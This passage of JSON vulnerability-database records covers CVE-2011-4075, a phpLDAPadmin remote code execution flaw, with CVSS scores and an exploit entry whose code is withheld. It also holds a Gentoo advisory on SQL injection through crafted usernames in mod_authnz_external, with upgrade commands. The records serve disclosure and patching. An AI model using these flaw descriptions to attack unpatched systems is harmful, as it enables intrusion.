RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-4075"], "modified": "2013-04-02T00:00:00", "id": "E-25", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T18:45:55", "description": "A remote code execution vulnerability has been reported in phpLDAPadmin web server.", "cvss3": {}, "published": "2013-10-13T00:00:00", "type": "checkpoint_advisories", "title": "PHP phpLDAPadmin Remote Code Execution (CVE-2011-4075)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2011-4075"], "modified": "2022-08-02T00:00:00", "id": "CPAI-2013-2519", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "gentoo": [{"lastseen": "2022-01-17T19:13:24", "description": "### Background\n\nmod_authnz_external is a tool for creating custom authentication backends for HTTP basic authentication. \n\n### Description\n\nmysql/mysql-auth.pl in mod_authnz_external does not properly sanitize input before using it in an SQL query. \n\n### Impact\n\nA remote attacker could exploit this vulnerability to inject arbitrary SQL statements by using a specially crafted username for HTTP authentication on a site using mod_authnz_external. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Apache mod_authnz_external users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=www-apache/mod_authnz_external-3.2.6\"", "cvss3": {}, "published": "2011-10-25T00:00:00", "type": "gentoo", "title": "Apache mod_authnz_external: SQL injection", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-2688"], "modified": "2011-10-25T00:00:00", "id": "GLSA-201110-23", "href": "https://security.gentoo.org/glsa/201110-23", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
